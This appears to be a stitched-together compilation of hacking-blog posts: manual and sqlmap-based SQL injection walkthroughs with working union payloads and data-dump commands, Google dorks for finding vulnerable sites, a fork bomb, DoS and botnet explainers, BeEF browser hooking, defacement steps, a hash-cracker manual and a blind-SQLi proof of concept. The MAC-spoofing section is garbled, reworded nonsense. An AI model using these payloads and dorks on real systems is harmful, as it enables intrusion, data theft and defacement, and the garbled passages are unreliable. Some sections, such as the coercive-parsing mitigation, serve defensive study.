Introduction

Lets get started at an apparently unrelated point. Lets assume we create a table in SQL. Now there are three main parts of a database management system, like SQL. They are –

Steps

• Manually using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). For example, you can instruct the database to give you all the data from a table by executing the command-

SELECT * FROM Users WHERE UserId = 105 or 1=1

Now, while the first part of the query “UserID=105” may not be true for all user, the condition 1=1 will always be true. So basically the query will be prompted to  return all the data about the user for all the users for whom 1=1. Effectively, you have the username and passwords and all other information about all the users of the website.

The first command is legit and gives you access to data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to data of all accounts.

• Using some tool – Some tools help in making the process easier. You still have to use commands but using tools is much more practical after you have an idea what is actually happening. I don’t recommend all the GUI Windows tools which are found on malware filled websites, and never work. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali linux installed. In Kali linux, there is a great tool called SQLMap that we’ll be using.

That’s it for this tutorial, you now know how SQL Injections work. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial. Also, check out the navigation bar at the top of the blog to see if you find something that interests you. We have a lot of tutorials for beginners in the field of hacking.

Sql Injection – Hacking Websites

In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don’t need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on Basics Of SQL Injection.

SQL Injection

Finding A Vulnerable Website

Dorks

Using Dorks

inurl:”products.php?prodID=”

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl instructs google to look at the URLs in it’s search index and provide us with the ones which have a specific line in them. Inside the inverted commas is the specific URL which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don’t know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities

A typical error message

But right now you only know that the site is vulnerable. You still have to find which colums/rows are vulnerable.

Finding number of columns/rows

Unification

This is what you vulnerable page looks like to start with

As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

10 columns. Nothing so far.

12 columns. Error….

So if there was an error on 12th columns. This means there were 11 columns total. So to find the vulnerable column, we have to execute –

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

Now we can see total four numbers on the page. 11,7,2 and 9. It won’t be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-

Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that 11th column is the vulnerable one. These kind of deductions make hacking very interesting and remind you it’s more about logic and creativity than it’s about learning up useless code.
Now we are finally where we left out before we changed our stream. We need to find the sql version. It can sometimes be very tricky. But lets hope its not in this case.
Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you’ll see something like

The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.
And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables

We now have the names of all the tables. Here it is – CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()

Obtaining columns

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

We now know the columns of the table events

Extracting data from columns

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS

The page didn’t display properly, this means that the our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don’t let this failure demotivate you.

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we’ll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first column CHARACTER_SET_NAME. Now finally we have the final code as-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

This table has a lot of data, and we have all the character_sets name.

So finally now you have data from CHARACTER_SET_NAME column from CHARACTER_SETS table . In a similar manner you can go through other tables and columns. It will be definitely more interesting to look through a table whose name sounds like ‘USERS’ and the columns have name ‘USERNAME’ and ‘PASSWORD’.  I would show you how to organize results in a slightly better way and display multiple columns at once. This query will return you the data from 4 columns, seperated by a colon (:) whose hex code is 0x3a.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

Finally you have successfully conducted an sql injection attack in the hardest possible way without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don’t know what they actually do.

In the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we’ll be using Kali Linux (see the top navigation bar to find how to install it if you haven’t already) and SqlMap (which comes preinstalled in Kali) to automate what we manually did in theManual SQL Injection tutorial to hack websites.

Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we’ll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial thatthis website is vulnerable.

Kali Linux

Sqlmap

Hacking Websites Using Sqlmap in Kali linux

Sql Version

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we’ll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the –time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –time-sec 15

The final result of the above command should be something like this.

Database

List of  a few common enumeration commands

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

So the two databases are acuart and information schema.

Table

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables

The result should be something like this –
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns

Data

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass –dump

Here’s the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don’t get tempted to join the dark side. You don’t look pretty behind the bars. That’s it for this tutorial.

Just like most other things associated with hacking, a denial of service attack is not everyone’s cup of tea. It, however, can be understood if explained properly. In this tutorial, I’ll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We’ll start at the easiest point.

What effect does a denial of service attack have

Basic Concept

Scenario One : Multiplayer online game

They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

How denial of service attacks are carried out

A Live DOS on your Kali Machine

:(){ :|:& };:

Crashing Windows Using Batch file

:1
Start
goto 1

In a previous post, I had introduced you to the basic idea of a denial of service attack. We used real life examples (bus stop and online game) to depict the idea behind a DOS attack. We crashed our own Windows and Kali Linux machine (using batch and command line interface respectively). Now it’s time to learn how actually DOS of service attacks work, in terms of packets and other networking terms. So here is a one by one description on four of the well known attacks.

Various methods of Denial Of Service attack

ICMP flooding (smurfing)

Contents of an ICMP packet (should not bother you currently)

ICMP packets have two purposes (technically)-

SYN flooding

The three way handshake (that didn’t happen in our case)

In SYN flooding, the attacker send the target a large number of TCP/SYN packets. These packets have a source address, and the target computer replies (TCP/SYN-ACK packet) back to the source IP, trying to establish a TCP connection. In ideal condition, the target receives an acknowledgement packet back from the source, and the connection established is in a fully open state. However, the attacker uses a fake source address while sending TCP packets to the victim, and the target’s reply goes to an inexistent IP, and therefore, does not generate an acknowledgement packet. The connection is never established, and the target is left with a half open connection. Eventually, a lot of half open connections are created, and the target network gets saturated to the point where it does not have resources left to respond to the genuine packets, resulting in a successful DOS attack. Also, since the connections stay open for a while, the server loses its ability to work for a good amount of time after the attack has been stopped.

Teardrop attack

A small botnet

Now, this is not an attack is such, rather, it is a way of carrying out the attacks more effectively. When carried out against a large server, the above attacks usually prove ineffective. Your home router is nothing when compared to the HUGE servers that big websites have, and handling a single PCs DOS effect can be a piece of cake. This leads to the need of a Distributed Denial of Service attack. In a distributed denial of service, hacking groups use their numbers as strength. For example, if you have 500 friends who know how to carry out a denial of service attack, then the combined impact is much more dangerous than that of a lone PC. However, it is not always possible to have 500 hackers next door, and not all of us are part of large black hat hacking organisations.

Try not to end up like this

This is where the botnets steps in. Now the bad guys use tools called RATs (remote administration tools) to infect and get total control over computers over the internet. The RATs are a kind of trojan, and can lie there on your PC and you’ll never find out. By the use of crypting, some hackers have mastered anti-virus evasion, and these RATs can lie undetected on your PC for years. This is 100% illegal. You can easily end up in jail for this, and I recommend that you stay away from this. But, its important that you are aware of the existence of such tools, and more importantly, what the hackers can do with them. Now lets assume you made a RAT and its has infected 10,000 people. You can actually control those 10,000 computers. Now there’s this website server that you don’t like, and you’re this badass hacker who takes down stuff he doesn’t like. No, you don’t have a warehouse full of networking power (servers), but you do have ten thousand computers at your disposal, and this is called a botnet. You also have 5 friends who are hackers, and have similarly sized botnets. Such immense networking power can easily take down a large website for hours, if not days. The results of flooding packets from 50,000 computers can be catastrophic. With modern day firewalls, it is almost impossible to flood servers and take them down using one single computers, so while botnets are the most unethical entities, they are also the most powerful. Now here is a suggestion, Denial of Service attacks are easy to trace back (if you are a beginner), and even if you are good, there is always someone better, and you can’t hide forever. So try not to send bad packets at random websites, you won’t look good in orange

Running sqlmap yourself is not difficult. Read through this tutorial and you will get an introduction to a powerful sql injection testing tool. Of course this is the same tool we use on our online sql injection test site.

One thing to keep in mind is that Sqlmap is a python based tool, this means it will usually run on any system with python however we like Ubuntu, it simply makes it easier to get stuff done. Python comes already installed in Ubuntu. To get started with sqlmap it is a matter of downloading the tool, unpacking it and running the command with the necessary options. Lets not get ahead of ourselves, there may be some Windows users amongst you so let me start off with getting an Ubuntu install up and running. It is easy to get started on an Ubuntu Linux system even if the thought of Linux sends into shivering spasms of fear. Who knows you may even like it.

If you are running Microsoft Windows as your main operating system you will likely find it the most convenient and simple to run an install of Ubuntu Linux in a virtual machine. You can then play with sqlmap, nmap, nikto and openvas along with a hundred other powerful open source security tools. If you would like to perform remote scanning such as that provided by hackertarget.com you could pay for a cheap Ubuntu based VPS from one of hundreds of providers, paying anything from $10 per month to $100 or so. Linode is great for this, providing high quality and solid systems for the price.

Step 1: Install Virtualbox

Virtualbox is a free and easy to use virtual machine manager, you could of course use VMware or Parallels but we will use virtualbox.

Select Bridge for your adapter, you could do NAT or Host Only of course just depends on your requirements. By using bridge mode your VM will have an IP address on your local network this makes it easier when you are playing with network based security testing tools. Security testing is fun, just ensure you only test on systems you own / operate or have permission to scan.

Step 2: Ubuntu Installation

Download the latest Ubuntu iso from http://www.ubuntu.com, select the ISO as the boot media for your guest and start the virtual machine. Select the install option and Ubuntu will be installed onto the virtual hard disk on the machine.

Step 3: SQLmap Installation

Python is pre-installed in Ubuntu so all you need to do is download sqlmap from sourceforge, unpack it into a directory and start your testing.

wget from http://sqlmap.sourceforge.net/#download

You can unpack it with a GUI based tool (double click on it) or use tar and gzip together with this command.

tar zxvf sqlmap-0.9.tar.gz

cd sqlmap

python sqlmap.py

This should be your results when you run the sqlmap.py script from a working installation:

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

Usage: python sqlmap.py [options]

sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help

The error is merely telling us we did not fill in the necessary parameters for a test to take place. You can repeat the command using the (-h) to get a full list of options or see the excellent online help and tutorials on the sqlmap project page.

For a simple test we will use the HTTP GET testing option against a single uri.

python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'

This will run a bunch of sql injection tests against that URL with the parameter (id) being tested for SQL Injection.

SQLmap can be used to not only test but also to exploit SQL Injection, doing things such as extracting data from databases, updating tables and even popping shells on remote hosts if all the ducks are in line. All these options and examples are available on the excellent sourceforge project page. So now you have a working installation get on over there and start testing.

– Microsoft Source Code Analyzer – www.microsoft.com

– Microsoft UrlScan – www.microsoft.com

– dotDefender – www.applicure.com

– IBM AppScan – www.ibm.com

– HP WebInpect – www.hp.com

– SQLDict – ntsecurity.nu

– HP Scrawlr – www.hp.com

– Paros – www.darknet.org.uk

– SQL Block Monitor – sql-tools.net

– Acunetix – www.acunetix.com

– GreenSQL – www.greensql.net

– CAT.NET – www.microsoft.com

Attack description

Coercive Parsing is one of the simplest attacks to mount! It aims at exhausting the system resources of the attacked web service. The attacker just sends a SOAP message with an unlimited amount of opening tags in the SOAP Body. In other words: The attacker sends a very deeply nested XML document to the attacked web service.

Test on AXIS 2 web services showed that the attack results in a CPU usage of 100% while the SOAP message is processed. When using a socket on the attacker side the attack can last for as long as a connection between the attacker and the victim exists. All the attacker has to do is “pump” opening tags in the socket for as long as he wishes to disable the web service.

This attack is one of the more devastating denial of service attacks, however countermeasures are available.

NOTE: Only web services using a DOM parser are susceptible to this attack. The DOM Parser creates an in-memory representation of the SOAP message. During this process the SOAP message size can raise by a factor of 2 to 30. When very large documents are processed memory exhaustion is often the result. When using a streaming based parser like SAX it is very unlikely for the attack to succeed, since the entire document is never loaded in memory.[1]

Attack subtypes

There are no attack subtypes for this attack.

Prerequisites for attack

In order for this attack to work the attack has to have knowledge about the following things:

1. Attacker knows the endpoint of web service. WSDL is not required, since the attack is solely focused on the XML Parser. It doesn’t matter if the Operations within the SOAP Message are valid.
2. Attacker can reach the endpoint from its location. Access to the attacked web service is required. If the web service is only available to users within a certain network of a company, this attack is limited.

Graphical representation of attack

• Red = attacked web service component
• Black = location of attacker
• Blue = web service component not directly involved in attack.

Attack example

The following SOAP message shows an example with a “Coercive Parsing Attack” payload.

<soapenv:Envelope xmlns:soapenv="..." xmlns: soapenc:"...">
<soapenv:Body>
 <x>
    <x>
       <x>  
          <x>
             <x>
                 <!-- Continued for as long as wanted by the attacker -->

Listing 1: “Coercive Parsing Attack” payload.

Attack mitigation / countermeasures

The “Coercive Parsing” attack can be fully stopped when using strict schema validation. Each WSDL should contain a detailed description of the used elements, attributes, and data types. For example when only one Element <Surname> is expected within the SOAP body the XML Schema should contain the following elements:

..
<!-- excerpt fictional XML Schema -->
<xs:element name="Surname" type="xs:string"/>
..

Listing 2: Excerpt of a XML Schema for the tag “Surname”
By using the data type “string” only strings are allowed within the element tags. The injection of more tags within the <Surname> tag is not possible. Since the default maximum and minimum number of occurrences is 1, the element has to show up exactly one time in the SOAP body. If no other tags are defined within the XML Schema of the SOAP body, any other tag is prohibited by default too, making it impossible to mount the attack. Therefore any SOAP message that violates this schema is rejected.

It is understood that a strict schema validation is resource intensive, however one should be clear how easy it is to compromise the availability of a web service when turning off schema validation.

Today we’re going to be introducing a new tool for hacking web browsers. Often times, we will need to exploit a variety of vulnerabilities associated with web browsers. For this sort of exploitation, we can use a popular tool named BeEF (Browser e Exploitation Framework).

How BeEF works is actually fairly easy to understand. There is a JavaScript file provided by BeEF, simply named hook.js. Our job as the attacker is to find a way to run this JavaScript on the victim’s browser. Once it’s been run, we will have control over their browser in various aspects. There are multiple ways we can execute this script. For example, we could set up a phishing page with the hook inside of the HTML code, or we could inject it into their traffic using a Man in the Middle attack. But today we’re just going to be using the demo page provided by BeEF. So, let’s get started!

Step 1: Start up and Login to BeEF

If we’re going to use BeEF, we need to start it! If you’re using Kali 2, you can find BeEF on the dock. If you are aren’t using Kali 2, you can launch BeEF by enter the following command:

service beef-xss start

Now that we’ve started BeEF, we need to login. If we point our web browser at the localhost on port 3000 with the /ui/authentication URI, we will see the BeEF login page (In short: 127.0.0.1:3000/ui/authentication). When we see this page, we need to enter the default credentials in order to use BeEF. The default username and password are both “beef.” Let’s go ahead and log in now:

Alright, now that we’ve entered our credentials and logged in, we can see the first page. Let’s take a look at this page and then we’ll break it down:

Now, to our immediate left we can see a section named “hooked browsers.” This is where BeEF will list all the browsers we currently have under our control. There is only one victim here at the moment, which is ourselves. Now that we’ve logged in and seen the start page, let’s move on to hooking our victim.

Step 2: Hook the Victim

Now that we have BeEF up and running, we need to hook the victim so that we can control their browser. We will be using the BeEF demo page to run the hook. Now we need to move the victim and navigate to the demo page. The demo page can be accessed in the browser by entering the address of the attacking system on port 3000 under /demos/basic.html. So, for our demonstration today, we need to enter 10.0.0.19:3000/demos/basic.html on our victims browser, let’s do that now:

Now that we’ve navigated our victim to the demo page containing the BeEF hook, we should see them appear under the “hooked browsers” section we saw earlier:

There we go! We’ve successfully hooked our victims browser. Now that we have some basic control over it, we can do many things that will aid us in compromising this victim.

Step 3: Wreak Havoc

Now that we can control our victims browser, we’re going to demonstrate the kind of things we can do. We’re simply going to use some JavaScript to find out what plugins are installed on the browser. First, we need to select our victim and navigate to the “commands” tab of BeEF’s GUI. Let’s see what this looks like now:

Now that we’ve navigated to our commands tab, we can look through all of the possible commands we can execute on the victim’s browser. Please note that not all of these will work as some of them are circumstance specific. The one we’re after in this instance is the raw javascript module. We can find this module under the “Misc” folder in the commands tab. Let’s select this module now:

We can see that in this module we have a box to enter some JavaScript. In order to see the plugins that the victim has, we’re going to return some information out the the “navigator” object using our code. We’re also going to make an alert box appear in the victim’s browser, just for fun. Let’s take a look at this code now:

Now that we have entered our code to execute, we simply need to press the “execute” button on the bottom right of the BeEF page. Once we do this, we should see the JavaScript return an array containing the currently installed plugins. Let’s execute our code and see the results now:

Here can see a list of all the plugins that the victim has installed on their browser! We could look deeper and see if there any exploitable vulnerabilities in these plugins, but that’s best discussed later. Now that we have our results, let’s move back to the victim and take a look at our alert box!

There we have it! We were not only able to successfully hijack our victim’s browser, but we were able to extract information from it that could open a future avenue for attack! As we’ve demonstrated here today, browser hijacking can be extremely useful to any hacker looking for a way into a system. Not only is it good for finding the vulnerabilities, but in some cases we can use it to exploit them as well. That’s all for the introduction to hijacking with BeEF. In the next article, we’ll be taking a closer look at social engineering with BeEF, and how we can use it to steal credentials from the user

HOW TO SPOOF YOUR MAC ADDRESS (ANONYMITY)

MAC (Media Access Control) is a number that identifies your network adapter or adapters for connecting to the internet. To remain exceptionally anonymous you must change your MAC IP address. By changing your macintosh address you can:

• Staying Anonymous
• Bypass Mac Filters
• Mac Authentication

#1 Staying Anonymous :

The first and the chief thing by ridiculing your macintosh location is with the end goal of namelessness. Your macintosh location can be seen by any individual on your neighborhood (LAN) or besides in the event that you are associated with a WiFi system any individual can see your macintosh address by simply running a basic sweep either from windows or Linux. A basic sample of this is to simply utilize the order from Linux as

The BSSID’s recorded over allude’s to the macintosh addresses for different systems accessible in your reach. By simply running a straightforward sweep we discover the different BSSID’s accessible. Programmers may attempted to misuse your system in the event that they figured out your macintosh address and can utilize the web as being “you” That’s the reason you have to change your MAC address.

#2 Bypassing MAC Filters :

If you ever need to unite with an open WiFi system with the end goal of staying unknown however things didn’t turned out really well, may be the WiFi proprietor is utilizing a MAC channel. Macintosh channel implies just permitting those clients to interface which have a particular MAC address. By changing your MAC location to that particular location which is joined you can associate with a system yet first by de validating the present client.

#3 MAC Authentication :

Some ISP (Internet Service Provide) might just permit you to interface with a MAC address in the event that you have a particular location. So changing your location dependably helps for this situation.

HOW TO CHANGE YOUR MAC ADDRESS

1. Smac ( For Windows) :- It is an effective MAC changer that has been around for a considerable length of time. It is anything but difficult to use with any equipment. You should be a “specialist” to utilize this. It totally parodies your Mac address. Rather than utilizing Smac there are numerous product’s accessible which you can use to change your PC’s macintosh location thus on stay unknown on the web.

You can download it by clicking Here

2. Macintosh Changer (Linux) :- Mac-changer is a free accessible apparatus which is utilized for changing the Mac address in a Linux machine. What you have to do is select your web interface and run the summon and its basically done.

The above screenshot is taken from Backtrack and it is unreservedly accessible in Backtrack and numerous other higher adaptations.

sudo well-suited get introduce macchanger-gtk 

Thanks for Reading

How to deface suspendedpage.cgi: Today in this article we will discuss about How to deface suspendedpage.cgi. You might have landed to this suspendedpage.cgi page by mistake and ignored it but we can deface it.  Its very simple How to deface suspendedpage.cgi all you have to do is to follow the steps given below
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How to deface suspendedpage.cgi

How to deface suspendedpage.cgi. So we are discussing here about to deface suspendedpage.cgi. all you have to do is uts to convert your deface page’s html coding to .cgi script and upload it in /cgi-bin/ or /cgi-sys/ directories . Just follow the steps

How to deface suspendedpage.cgi

How to deface suspendedpage.cgi. Just follow the simple steps given below How to deface suspendedpage.cgi

• Go HERE and convert your deface.html to .cgi script
• Save it as suspendedpage.cgi
• And finally upload it in the /cgi-bin/ or /cgi-sys/ directories
• When you have uploded it, change the chmod from suspendedpage.cgi to 755.
• Save and see the result
  Example: www.site.com/cgi-sys/suspendedpage.cgi
• BOOM!! You have DEFACED suspendedpage.cgi page

So that’s it If you have any doubts feel free to ask

Censorship is nothing new, but as many governments and law enforcement agencies tighten the noose, anti-surveillance solutions need to get creative.

The Tor Project, which runs the anti-surveillance Tor network, is one such being.

The non-profit runs a network designed to disguise the original locations of users through traffic and relay points, and is often used by journalists, activists, and those attempting to circumvent censorship.

Nima Fatemi, an independent security research and member of the Tor Project, highlighted in a recent blog post how users in countries such as China, Saudi Arabia, and Iran can still try to access the network.

As noted by Motherboard, governments including Saudi Arabia, Bahrain, Iran, Russia, and China often attempt to block the use of virtual private networks (VPNs) in an effort to keep an eye on their citizen’s online activities.

However, blocking Tor is a more complicated problem due to the use of volunteer-ran nodes and relays used to reroute traffic and disguise original IP addresses.

According to Fatemi, the Tor Browser spoofs the UserAgent identity feature to make users look alike and avoid spying, as well as fingerprint attacks. However, Tor is still an open network where anyone can get a list of relay points — and so governments can simply block them.

“They can simply get the list of Tor relays and block them,” Fatemi noted. “This bars millions of people from access to free information, often including those who need it most. We at Tor care about freedom of access to information and strongly oppose censorship.”

As a result, Tor has developed what the organization called Pluggable Transports (PTs). PTs are a type of “bridge” into the Tor network which “make encrypted traffic to Tor look like not-interesting or garbage traffic,” according to the developer.

If users already want to try out this censorship-thwarting tool, they are in luck — as PTs are already included in the Tor Browser.

Tor has provided a step-by-step guide, as shown in the image below:

If you need additional bridges, you can email the project here or visit the BridgeDB website.

Tor has hit the spotlight recently after a scandal involving one of the “core” members of the project’s development team rocked the very foundations of the organization. Jacob Appelbaum, a 33-year-old developer, stepped down from his position after being accused ofalleged inappropriate sexual misconduct.

While Appelbaum has denied the claim as a “calculated and targeted attack,” an investigation conducted by an external law firm found that “many people inside and outside the Tor Project have reported incidents of being humiliated, intimidated, bullied, and frightened by Jacob,” according to Tor executive director Shari Steele.

As a result of the scandal, the full Tor board has been replaced with new faces including security expert Bruce Schneier, executive director of the Electronic Frontier Foundation (EFF) Cindy Cohn, and Matt Blaze, a computer and information science professor at the University of Pennsylvania.

IGHASHGPU is an efficient and comprehensive command line GPU based hash cracking program that enables you to retrieve SHA1, MD5 and MD4 hashes by utilising ATI and nVidia GPUs.

It even works with salted hashes making it useful for MS-SQL, Oracle 11g, NTLM passwords and others than use salts.

IGHASHGPU is meant to function with ATI RV 7X0 and 8X0 cards, as well as any nVidia CUDA video cards, providing a variable speed in accordance with the users GPU. The program also features a ‘-cpudontcare’ command that allows you to tell IGHASHGPU that it can use the maximum level of GPU, without any particular regard for CPU usage.

At the same time, you can set a temperature threshold for tracking your hardware (’-hm’), so you can make sure to desist any activity that causes your system to go over the permitted value (the default is 90 degrees Celsius).

It also has a feature that lets you set the block size so as to adjust the video response time and reduce any possible lags; if on the other hand, this is a characteristic that does not bother you in any particular way, you can input a higher value (as IGHASHGPU supports block sizes ranging between 16 and 23).

Hashes Supported for Cracking

As IGHASHGPU supports salted hashes it’s possible to use it for:

• Plain MD4, MD5, SHA1.
• NTLM
• Domain Cached Credentials
• Oracle 11g
• MySQL5
• MSSQL
• vBulletin
• Invision Power Board

Supported Cards/Requirements

• Only currently supported ATI cards are:
  • HD RV7X0
  • RV830/870
  • 4550
  • 4670
  • 4830
  • 4730
  • 4770
  • 4850
  • 4870
  • 4890
  • 5750
  • 5770
  • 5850
  • 5870
• Catalyst 9.9+ must be installed.
• Only supported nVidia cards are the ones with CUDA support, i.e. G80+.
• Systems with multiple GPUs supported.

  ighashgpu.exe [switch:param] [hashfile.txt]
   
  -c             csdepa Charset definition (caps, smalls (default), digits, special, space, all)
  -u             [chars] User-defined characters
  -uh           [HEX] User-defined characters in HEX (2 chars each)
  -uhh         [HEX] User-defined characters in Unicode HEX (4 chars each)
  -uf            [filename] Load characters from file. Not used with Unicode.
  -sf            [password] Password to start attack from
  -m           [mask] Password mask
  -ms         [symbol] Mask symbol
  -salt        [hex] Append salt after password
  -asalt      [string] Append salt in ascii after password
  -usalt      [string] Append salt in unicode after password
  -ulsalt     [string] Same as above but unicode string firstly transformed to lower case
  -min       [value] Minimum length (default == 4), must be >= 4
  -max      [value] Maximum length (default == 6), must be <= 31 (not counting salt length)
  -h           [hash] Hash to attack (16 or 20 bytes in HEX)
  -t            [type] Type of hash to attack
  -devicemask:[N] Bit mask for GPUs usage, bit 0 == first GPU (default 0xFF, i.e. all GPUs). 
  -cpudontcare Tell ighashgpu that you want maximum from GPU and so don't care about CPU usage at all (and it means one CPU core at 100% per one GPU).
  -hm               [N] Set threshold temperature for hardware monitoring, default is 90C. You can disable monitoring by setting this value to zero.
  -blocksize     [N] Set block size, by default N = 23 which means 2^23 = 8388608 passwords offloaded to GPU in a single batch.
   
  By default charset processed as ANSI one. (i.e. WideCharToMultiByte(CP_ACP, ...) You can change this with: 
   
  -unicode  Use unicode
  -oem        Use oem encoding
  -codepage  [page] Convert charset to specific codepage (need to have it at system of course
  

   

  You can download IGHASHGPU here:

  ighashgpu_v0.80.16.1.zip

# Exploit Title: SimplePHPQuiz - Blind SQL Injection
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz
# Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip
# Version: [app version] (REQUIRED)
# Version: Latest commit
# Tested on: Debian [wheezy]


### Vulnerability
1-1. Nomal Request
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

1-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

2-1 Attack Request 1
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

2-2 Response
    <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

3-1 Attack Request 2
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

3-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>


### Weak Parameters
correct_answer parameter
question parameter
wrong_answer1 parameter
wrong_answer2 parameter
wrong_answer3 parameter


### SQLMAP Result
